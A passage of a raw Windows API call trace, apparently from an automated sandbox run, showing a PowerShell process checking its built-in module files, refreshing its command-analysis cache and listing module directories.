GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b7de6d0 | out: lpFileInformation=0x1b7de6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8)) returned 1 [0180.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5b0) returned 1 [0180.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x1b7de1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0180.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5f0) returned 1 [0180.803] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7de6d0 | out: lpFileInformation=0x1b7de6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1 [0180.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5b0) returned 1 [0180.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x1b7de1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0180.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5f0) returned 1 [0180.803] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7de6d0 | out: lpFileInformation=0x1b7de6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0180.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5b0) returned 1 [0180.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de610) returned 1 [0180.803] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0180.803] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_", nBufferLength=0x105, lpBuffer=0x1b7de0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_", lpFilePart=0x0) returned 0x6f [0180.803] GetFullPathNameW (in: lpFileName="PowerShell_AnalysisCacheEntry_", nBufferLength=0x105, lpBuffer=0x1b7de0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\PowerShell_AnalysisCacheEntry_", lpFilePart=0x0) returned 0x43 [0180.804] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\PowerShell_AnalysisCacheEntry_", lpszLongPath=0x1b7de080, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0180.804] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7ddfd0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0180.805] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_*", lpFindFileData=0x1b7de2b0 | out: lpFindFileData=0x1b7de2b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e2e2ca, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e2e2ca, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xfeb88451, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x25a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_01c28806-e5ae-41cc-b284-e627e1b02beb", cAlternateFileName="PODA56~1")) returned 0x1a9b6420 [0180.806] FindNextFileW (in: hFindFile=0x1a9b6420, lpFindFileData=0x1b7de3d0 | out: lpFindFileData=0x1b7de3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e545ef, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xfebd4a75, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x22ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3", cAlternateFileName="PO4D8E~1")) returned 1 [0180.806] FindNextFileW (in: hFindFile=0x1a9b6420, lpFindFileData=0x1b7de3d0 | out: lpFindFileData=0x1b7de3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e0807c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e0807c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xfeb620cc, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x662, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_6de40067-cd2a-4666-8cd9-870e0a588215", cAlternateFileName="POD9C8~1")) returned 1 [0180.806] FindNextFileW (in: hFindFile=0x1a9b6420, lpFindFileData=0x1b7de3d0 | out: lpFindFileData=0x1b7de3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47cd6d9c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xfe9c3fe7, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x4a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_6fe77092-4798-42ae-bda5-e7f822b580e9", cAlternateFileName="POWERS~1")) returned 1 [0180.806] FindNextFileW (in: hFindFile=0x1a9b6420, lpFindFileData=0x1b7de3d0 | out: lpFindFileData=0x1b7de3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47dbbb94, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47dbbb94, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xfea6cccd, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x717, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_cc38888a-7080-4220-9b7d-de7a9b2167ba", cAlternateFileName="POWERS~4")) returned 1 [0180.806] FindNextFileW (in: hFindFile=0x1a9b6420, lpFindFileData=0x1b7de3d0 | out: lpFindFileData=0x1b7de3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47d49400, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47d49400, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xfe9ea297, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x2b07, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", cAlternateFileName="POWERS~3")) returned 1 [0180.807] FindNextFileW (in: hFindFile=0x1a9b6420, lpFindFileData=0x1b7de3d0 | out: lpFindFileData=0x1b7de3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e2e2ca, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e2e2ca, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xfeb88451, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x25a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_f9e52a2e-51b0-4ce6-9de0-3959d95ded6e", cAlternateFileName="POE0DC~1")) returned 1 [0180.807] FindNextFileW (in: hFindFile=0x1a9b6420, lpFindFileData=0x1b7de3d0 | out: lpFindFileData=0x1b7de3d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0180.807] FindClose (in: hFindFile=0x1a9b6420 | out: hFindFile=0x1a9b6420) returned 1 [0180.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de630) returned 1 [0180.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5e0) returned 1 [0180.811] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b2780 [0180.812] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a9b2780 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0180.812] CoTaskMemFree (pv=0x1a9b2780) [0180.812] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7ddef0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0180.812] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7de090, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0180.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de4d0) returned 1 [0180.812] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7de5b0 | out: lpFileInformation=0x1b7de5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0180.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de490) returned 1 [0180.812] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x1b7ddf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0180.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de410) returned 1 [0180.812] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x68c [0180.813] GetFileType (hFile=0x68c) returned 0x1 [0180.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de380) returned 1 [0180.813] GetFileType (hFile=0x68c) returned 0x1 [0180.813] SetEndOfFile (hFile=0x68c) returned 1 [0181.407] WriteFile (in: hFile=0x68c, lpBuffer=0x24cc070*, nNumberOfBytesToWrite=0x8a2, lpNumberOfBytesWritten=0x1b7de528, lpOverlapped=0x0 | out: lpBuffer=0x24cc070*, lpNumberOfBytesWritten=0x1b7de528*=0x8a2, lpOverlapped=0x0) returned 1 [0181.409] CloseHandle (hObject=0x68c) returned 1 [0181.412] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7de330, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0181.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de7b0) returned 1 [0181.413] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x24d6f58 | out: lpFileInformation=0x24d6f58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0181.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de770) returned 1 [0181.415] ReleaseMutex (hMutex=0x684) returned 1 [0181.418] CoCreateGuid (in: pguid=0x1b7de7d8 | out: pguid=0x1b7de7d8*(Data1=0x1a463de5, Data2=0x3b0d, Data3=0x44f8, Data4=([0]=0xb2, [1]=0x59, [2]=0x14, [3]=0x7a, [4]=0x74, [5]=0x60, [6]=0xc, [7]=0x11))) returned 0x0 [0181.429] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68c [0181.429] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6bc [0181.429] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c0 [0181.429] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c4 [0181.429] SetEvent (hEvent=0x6c4) returned 1 [0181.429] SetEvent (hEvent=0x68c) returned 1 [0181.429] SetEvent (hEvent=0x6bc) returned 1 [0181.429] SetEvent (hEvent=0x6c0) returned 1 [0181.430] AmsiCloseSession () returned 0x7ffb1cb78068 [0181.431] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c8 [0181.431] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.559] EtwEventActivityIdControl () returned 0x0 [0181.559] EtwEventActivityIdControl () returned 0x0 [0181.559] EtwEventActivityIdControl () returned 0x0 [0182.085] CoTaskMemAlloc (cb=0x20e) returned 0x1a9b1680 [0182.085] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1a9b1680, nSize=0x105 | out: lpBuffer="") returned 0x97 [0182.085] CoTaskMemFree (pv=0x1a9b1680) [0182.086] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd990, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0182.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dddd0) returned 1 [0182.086] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddeb0 | out: lpFileInformation=0x1b7ddeb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddd90) returned 1 [0182.089] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0182.097] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd990, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0182.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dddd0) returned 1 [0182.097] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddeb0 | out: lpFileInformation=0x1b7ddeb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0182.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddd90) returned 1 [0182.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0182.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dddd0) returned 1 [0182.097] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddeb0 | out: lpFileInformation=0x1b7ddeb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0182.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddd90) returned 1 [0182.098] CoTaskMemAlloc (cb=0x20e) returned 0x1a9b0e00 [0182.098] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1a9b0e00, nSize=0x105 | out: lpBuffer="") returned 0x97 [0182.098] CoTaskMemFree (pv=0x1a9b0e00) [0182.098] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd990, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0182.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dddd0) returned 1 [0182.098] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddeb0 | out: lpFileInformation=0x1b7ddeb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddd90) returned 1 [0182.099] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0182.104] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd990, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0182.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dddd0) returned 1 [0182.104] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddeb0 | out: lpFileInformation=0x1b7ddeb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0182.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddd90) returned 1 [0182.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0182.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dddd0) returned 1 [0182.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddeb0 | out: lpFileInformation=0x1b7ddeb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0182.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddd90) returned 1 [0182.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddcc0) returned 1 [0182.105] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0182.105] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7dd750, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\", lpFilePart=0x0) returned 0x2b [0182.105] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x1b7dd960 | out: lpFindFileData=0x1b7dd960*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6780 [0182.105] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.106] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0182.106] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, 